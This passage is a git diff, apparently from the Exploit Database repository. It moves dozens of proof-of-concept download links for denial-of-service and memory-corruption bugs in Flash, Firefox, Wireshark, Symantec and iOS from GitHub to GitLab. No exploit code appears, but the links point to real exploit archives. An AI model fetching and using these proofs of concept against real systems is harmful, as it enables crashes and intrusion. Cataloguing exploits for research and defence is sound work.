b/exploits/multiple/dos/39859.txt index db41dbd7b..8659d5081 100644 --- a/exploits/multiple/dos/39859.txt +++ b/exploits/multiple/dos/39859.txt @@ -128,4 +128,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. At Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39859.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39859.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39860.txt b/exploits/multiple/dos/39860.txt index 00709060a..32b566c21 100644 --- a/exploits/multiple/dos/39860.txt +++ b/exploits/multiple/dos/39860.txt @@ -145,4 +145,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. At Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39860.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39860.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39861.txt b/exploits/multiple/dos/39861.txt index 2254f0881..fd2d96b90 100644 --- a/exploits/multiple/dos/39861.txt +++ b/exploits/multiple/dos/39861.txt @@ -72,4 +72,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. At Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39861.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39861.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39862.txt b/exploits/multiple/dos/39862.txt index 0ed965fc8..ab2fd7d95 100644 --- a/exploits/multiple/dos/39862.txt +++ b/exploits/multiple/dos/39862.txt @@ -74,4 +74,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. At Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39862.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39862.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39863.txt b/exploits/multiple/dos/39863.txt index 8331b51ee..53269a07f 100644 --- a/exploits/multiple/dos/39863.txt +++ b/exploits/multiple/dos/39863.txt @@ -134,4 +134,4 @@ The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. At Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39863.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39863.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39867.py b/exploits/multiple/dos/39867.py index 9033facaa..2cecc3e7f 100755 --- a/exploits/multiple/dos/39867.py +++ b/exploits/multiple/dos/39867.py @@ -94,4 +94,4 @@ def _start(): sys.exit(0) if __name__ == '__main__': - _start() + _start() \ No newline at end of file diff --git a/exploits/multiple/dos/39877.txt b/exploits/multiple/dos/39877.txt index dafe824c0..543c49ca0 100644 --- a/exploits/multiple/dos/39877.txt +++ b/exploits/multiple/dos/39877.txt @@ -20,4 +20,4 @@ The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39877.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39877.zip \ No newline at end of file diff --git a/exploits/multiple/dos/39906.txt b/exploits/multiple/dos/39906.txt index 42392f311..87dbc52cc 100644 --- a/exploits/multiple/dos/39906.txt +++ b/exploits/multiple/dos/39906.txt @@ -6,4 +6,4 @@ Let Word recover it, its essential, and then you can trigger the bug afterwards Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39906.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39906.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40031.txt b/exploits/multiple/dos/40031.txt index 5a86ed39b..61af3276e 100644 --- a/exploits/multiple/dos/40031.txt +++ b/exploits/multiple/dos/40031.txt @@ -56,4 +56,4 @@ These bugs are obviously exploitable for remote code execution on all Symantec c Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40031.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40031.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40032.txt b/exploits/multiple/dos/40032.txt index 6a068b38b..8f8f9ba41 100644 --- a/exploits/multiple/dos/40032.txt +++ b/exploits/multiple/dos/40032.txt @@ -37,4 +37,4 @@ This issue is remotely exploitable just by receiving an email, visiting a websit Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40032.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40032.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40034.txt b/exploits/multiple/dos/40034.txt index eac6a3614..e334afaf3 100644 --- a/exploits/multiple/dos/40034.txt +++ b/exploits/multiple/dos/40034.txt @@ -24,4 +24,4 @@ This obviously won't work, because it doesn't verify that the old name will fit. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40034.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40034.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40035.txt b/exploits/multiple/dos/40035.txt index aa61e52f2..b59f91b20 100644 --- a/exploits/multiple/dos/40035.txt +++ b/exploits/multiple/dos/40035.txt @@ -27,4 +27,4 @@ That's (count + 1) * 4, without any checking that will succeed. The attached tes Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40035.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40035.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40036.txt b/exploits/multiple/dos/40036.txt index 99a436d6a..edae81345 100644 --- a/exploits/multiple/dos/40036.txt +++ b/exploits/multiple/dos/40036.txt @@ -52,4 +52,4 @@ start end module name Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40036.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40036.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40037.txt b/exploits/multiple/dos/40037.txt index b21f9ee3b..6cc3f71ef 100644 --- a/exploits/multiple/dos/40037.txt +++ b/exploits/multiple/dos/40037.txt @@ -81,4 +81,4 @@ int PPFindRecSet(tagSS_STREAM *stream, Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40037.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40037.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40087.txt b/exploits/multiple/dos/40087.txt index 9517eddde..ec5dc875c 100644 --- a/exploits/multiple/dos/40087.txt +++ b/exploits/multiple/dos/40087.txt @@ -6,4 +6,4 @@ To differentiate this from other ATF issues, this is an overflow in decompressin Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40087.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40087.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40088.txt b/exploits/multiple/dos/40088.txt index 46b491341..009b3ba0e 100644 --- a/exploits/multiple/dos/40088.txt +++ b/exploits/multiple/dos/40088.txt @@ -8,4 +8,4 @@ Took a closer look at this, it is a UaF of plane->model_hp_buffer in the open-so Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40088.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40088.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40089.txt b/exploits/multiple/dos/40089.txt index c0cf7a722..6a77e1aee 100644 --- a/exploits/multiple/dos/40089.txt +++ b/exploits/multiple/dos/40089.txt @@ -8,4 +8,4 @@ The issue sometimes takes multiple refreshes to crash Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40089.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40089.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40090.txt b/exploits/multiple/dos/40090.txt index 1b125f200..f37525236 100644 --- a/exploits/multiple/dos/40090.txt +++ b/exploits/multiple/dos/40090.txt @@ -6,4 +6,4 @@ LoadImage.swf?img=129 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40090.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40090.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40095.txt b/exploits/multiple/dos/40095.txt index 8df320acf..3fcda45e2 100644 --- a/exploits/multiple/dos/40095.txt +++ b/exploits/multiple/dos/40095.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40095.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40095.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40096.txt b/exploits/multiple/dos/40096.txt index f1e0cf6c3..d4c20bc01 100644 --- a/exploits/multiple/dos/40096.txt +++ b/exploits/multiple/dos/40096.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40096.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40096.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40097.txt b/exploits/multiple/dos/40097.txt index b89f58bb8..65348a06e 100644 --- a/exploits/multiple/dos/40097.txt +++ b/exploits/multiple/dos/40097.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40097.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40097.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40098.txt b/exploits/multiple/dos/40098.txt index b776233c0..a3eec87ec 100644 --- a/exploits/multiple/dos/40098.txt +++ b/exploits/multiple/dos/40098.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40098.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40098.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40099.txt b/exploits/multiple/dos/40099.txt index a2caeba60..cfed8939d 100644 --- a/exploits/multiple/dos/40099.txt +++ b/exploits/multiple/dos/40099.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40099.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40099.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40100.txt b/exploits/multiple/dos/40100.txt index b809f03ae..1f3335cf0 100644 --- a/exploits/multiple/dos/40100.txt +++ b/exploits/multiple/dos/40100.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-25.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40100.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40100.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40101.txt b/exploits/multiple/dos/40101.txt index 8bdbb5839..9c637f47a 100644 --- a/exploits/multiple/dos/40101.txt +++ b/exploits/multiple/dos/40101.txt @@ -51,6 +51,6 @@ that opens a specially crafted PDF file containing an invalid font (.ttf ) inclu =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-24.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40101.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40101.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40102.txt b/exploits/multiple/dos/40102.txt index 57ca0c34e..e8cb99c43 100644 --- a/exploits/multiple/dos/40102.txt +++ b/exploits/multiple/dos/40102.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains “Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-23.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40102.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40102.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40103.txt b/exploits/multiple/dos/40103.txt index ad5ae1586..dd8e7527e 100644 --- a/exploits/multiple/dos/40103.txt +++ b/exploits/multiple/dos/40103.txt @@ -54,6 +54,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Defi =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-22-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40103.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40103.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40104.txt b/exploits/multiple/dos/40104.txt index a46adf73e..72e038d53 100644 --- a/exploits/multiple/dos/40104.txt +++ b/exploits/multiple/dos/40104.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘Scen =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-21.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40104.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40104.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40105.txt b/exploits/multiple/dos/40105.txt index d2cea7aa2..58c889b27 100644 --- a/exploits/multiple/dos/40105.txt +++ b/exploits/multiple/dos/40105.txt @@ -52,6 +52,6 @@ visiting a Web page or open a specially crafted SWF file, which contains ‘TAG =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-20.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40105.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40105.zip ############################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40194.txt b/exploits/multiple/dos/40194.txt index d843a3d34..ad643622b 100644 --- a/exploits/multiple/dos/40194.txt +++ b/exploits/multiple/dos/40194.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40194.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40194.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40195.txt b/exploits/multiple/dos/40195.txt index 862cb95d6..589f077af 100644 --- a/exploits/multiple/dos/40195.txt +++ b/exploits/multiple/dos/40195.txt @@ -21,4 +21,4 @@ Fuzzed PCAP eats large amounts of memory ( >4GB ) with a single UDP packet on ts Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40195.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40195.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40197.txt b/exploits/multiple/dos/40197.txt index 5de1830a7..24821e97e 100644 --- a/exploits/multiple/dos/40197.txt +++ b/exploits/multiple/dos/40197.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40197.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40197.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40198.txt b/exploits/multiple/dos/40198.txt index d9c705790..df23a54ac 100644 --- a/exploits/multiple/dos/40198.txt +++ b/exploits/multiple/dos/40198.txt @@ -28,4 +28,4 @@ Credit goes to Chris Benedict, Aurelien Delaitre, NIST SAMATE Project, https://s Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40198.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40199.txt b/exploits/multiple/dos/40199.txt index c07493d35..5c0ffc524 100644 --- a/exploits/multiple/dos/40199.txt +++ b/exploits/multiple/dos/40199.txt @@ -84,4 +84,4 @@ Thread 1 (Thread 0x7ffff7fb9740 (LWP 1578)): Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40199.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40238.txt b/exploits/multiple/dos/40238.txt index c0ad48240..856355753 100644 --- a/exploits/multiple/dos/40238.txt +++ b/exploits/multiple/dos/40238.txt @@ -58,6 +58,6 @@ An attacker can use this flaw to read outside the allocated buffer, which could ========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/08/COSIG-2016-32.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40238.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40238.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40307.txt b/exploits/multiple/dos/40307.txt index a89dfe958..535fcc72c 100644 --- a/exploits/multiple/dos/40307.txt +++ b/exploits/multiple/dos/40307.txt @@ -21,4 +21,4 @@ A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40307.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40307.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40308.txt b/exploits/multiple/dos/40308.txt index 0769cfa10..8872761fc 100644 --- a/exploits/multiple/dos/40308.txt +++ b/exploits/multiple/dos/40308.txt @@ -23,4 +23,4 @@ A fla and swf are attached. The swf crashes in Chrome for Windows. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40308.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40308.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40309.txt b/exploits/multiple/dos/40309.txt index d7204052d..5cffa112d 100644 --- a/exploits/multiple/dos/40309.txt +++ b/exploits/multiple/dos/40309.txt @@ -26,4 +26,4 @@ A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40309.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40309.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40310.txt b/exploits/multiple/dos/40310.txt index 129e1bb25..32ceb1b20 100644 --- a/exploits/multiple/dos/40310.txt +++ b/exploits/multiple/dos/40310.txt @@ -19,4 +19,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40310.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40310.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40311.txt b/exploits/multiple/dos/40311.txt index b1e6340e7..4c0d87d7b 100644 --- a/exploits/multiple/dos/40311.txt +++ b/exploits/multiple/dos/40311.txt @@ -18,4 +18,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40311.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40311.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40355.txt b/exploits/multiple/dos/40355.txt index 52df9317e..0944171e0 100644 --- a/exploits/multiple/dos/40355.txt +++ b/exploits/multiple/dos/40355.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. The PoC prints the value of unallocated memor Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40355.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40355.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40356.txt b/exploits/multiple/dos/40356.txt index 5a0676c5b..32b9dad7e 100644 --- a/exploits/multiple/dos/40356.txt +++ b/exploits/multiple/dos/40356.txt @@ -17,4 +17,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40356.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40356.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40405.txt b/exploits/multiple/dos/40405.txt index 3b64d19f4..8cceb05af 100644 --- a/exploits/multiple/dos/40405.txt +++ b/exploits/multiple/dos/40405.txt @@ -10,4 +10,4 @@ As in issue 810, these are remote code execution vulnerabilities at the highest Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40405.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40405.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40420.txt b/exploits/multiple/dos/40420.txt index 9a3d761bc..b7c3d2f1b 100644 --- a/exploits/multiple/dos/40420.txt +++ b/exploits/multiple/dos/40420.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40420.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40420.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40421.txt b/exploits/multiple/dos/40421.txt index a697352a5..8aec27ad1 100644 --- a/exploits/multiple/dos/40421.txt +++ b/exploits/multiple/dos/40421.txt @@ -6,4 +6,4 @@ Fixed in the September update Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40421.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40421.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40510.txt b/exploits/multiple/dos/40510.txt index 681f9b301..92565b62b 100644 --- a/exploits/multiple/dos/40510.txt +++ b/exploits/multiple/dos/40510.txt @@ -58,6 +58,6 @@ structure that contain an invalid “ConstantPool” could lead to remote code e =========== https://cosig.gouv.qc.ca/wp-content/uploads/2016/10/COSIG-2016-35.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40510.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40510.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/40654.txt b/exploits/multiple/dos/40654.txt index ab555c3f3..8370f4e08 100644 --- a/exploits/multiple/dos/40654.txt +++ b/exploits/multiple/dos/40654.txt @@ -91,4 +91,4 @@ tested on OS X 10.11.6 (15G31) on MacBookPro10,1 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40654.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40654.zip \ No newline at end of file diff --git a/exploits/multiple/dos/40955.txt b/exploits/multiple/dos/40955.txt index 2e8cd91b1..5c4937a7b 100644 --- a/exploits/multiple/dos/40955.txt +++ b/exploits/multiple/dos/40955.txt @@ -151,4 +151,4 @@ I fear there are a great number of similar issues so just fixing this once insta Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40955.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40955.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41008.txt b/exploits/multiple/dos/41008.txt index e18c44b86..5bbdbf417 100644 --- a/exploits/multiple/dos/41008.txt +++ b/exploits/multiple/dos/41008.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41008.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41008.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/41012.txt b/exploits/multiple/dos/41012.txt index 27014d412..8dc27c55e 100644 --- a/exploits/multiple/dos/41012.txt +++ b/exploits/multiple/dos/41012.txt @@ -60,6 +60,6 @@ structure that contain an invalid value in “ActionGetURL2” could lead to rem =========== https://cosig.gouv.qc.ca/wp-content/uploads/2017/01/COSIG-2017-01.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41012.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41012.zip #################################################################################### \ No newline at end of file diff --git a/exploits/multiple/dos/41163.txt b/exploits/multiple/dos/41163.txt index b30eceaa1..a58915beb 100644 --- a/exploits/multiple/dos/41163.txt +++ b/exploits/multiple/dos/41163.txt @@ -93,4 +93,4 @@ Exploit for iOS 10.2 iPod Touch 6G 14C92 gets kernel arbitrary r/w Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41163.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41163.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41420.txt b/exploits/multiple/dos/41420.txt index 2f68e2c50..49bf214d8 100644 --- a/exploits/multiple/dos/41420.txt +++ b/exploits/multiple/dos/41420.txt @@ -4,4 +4,4 @@ There is an overflow in MP4 AMF parsing. To reproduce, put the attached files on Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41420.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41420.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41421.txt b/exploits/multiple/dos/41421.txt index 9a59055b4..6791fbddc 100644 --- a/exploits/multiple/dos/41421.txt +++ b/exploits/multiple/dos/41421.txt @@ -4,4 +4,4 @@ The attached fuzzed swf causes stack corruption when it is loaded, likely due to Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41421.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41421.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41422.txt b/exploits/multiple/dos/41422.txt index b99df27a4..a366986dc 100644 --- a/exploits/multiple/dos/41422.txt +++ b/exploits/multiple/dos/41422.txt @@ -4,4 +4,4 @@ The attached swf causes a use-after-free in applying bitmap filters. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41422.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41422.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41423.txt b/exploits/multiple/dos/41423.txt index 0fa95fb61..2484f10b9 100644 --- a/exploits/multiple/dos/41423.txt +++ b/exploits/multiple/dos/41423.txt @@ -6,4 +6,4 @@ To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41423.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41423.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41608.txt b/exploits/multiple/dos/41608.txt index fa9616800..a4ceee375 100644 --- a/exploits/multiple/dos/41608.txt +++ b/exploits/multiple/dos/41608.txt @@ -4,4 +4,4 @@ The attached file causes an out-of-bounds read when its metadata is parsed Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41608.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41608.zip \ No newline at end of file diff --git a/exploits/multiple/dos/41609.txt 